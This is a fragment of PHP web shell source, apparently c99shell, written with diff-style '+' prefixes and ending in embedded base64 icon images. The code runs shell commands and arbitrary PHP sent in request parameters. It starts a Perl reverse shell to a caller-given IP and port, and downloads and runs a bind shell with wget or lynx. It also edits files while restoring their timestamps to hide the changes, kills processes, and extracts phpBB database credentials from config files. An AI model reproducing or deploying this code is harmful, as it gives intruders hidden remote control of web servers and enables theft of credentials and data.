Chek'> +</form> +<br><br><br> + + + + + </center> + + </center> + </td> +</tr></TABLE> + + + + + + + + + + + + +<?php + +if (isset($_POST['dosyaa'])) +{ +dosyayicek($_POST['dosyaa'],$_POST['yeniyer']); + +} +if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); +echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; +} +if (!empty($_GET['dolma'])) +{ +$sayko=htmlspecialchars($_GET['dolma']); +if ($sayko == "wgetcan") +{ + +myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + + +} + +else if ($sayko =="freadcan") +{ +dosyayicek($adires,"sayko_bind"); +myshellexec("./sayko_bind"); +} + +else if ($sayko == "lynxcan") +{ +myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); + +} + + + + + +} + +if (!empty($_POST['erorr'])) +{ + + + +error_log($_POST['erorr'], 3, "php://".$_POST['nere']); + + + +} + + + + + + + + + +} +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo "</tr>"; + } + } + } + $head[$k] = "<b>".$head[$k]."</b>".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $i=>$k) + { + echo "<tr>"; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), + array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), + array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), + array("Code","code"), + array("Session","phpsess"), + array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), + array("SDB","sdb"), + array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), + array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), + array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), + array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), + array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") + ); + echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + echo "</b><hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "<center><b>Size:</b>&nbsp;"; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; + if ($imgsize != $v ) {echo $v;} + else {echo "<u>".$v."</u>";} + echo "</a>&nbsp;&nbsp;&nbsp;"; + } + echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> 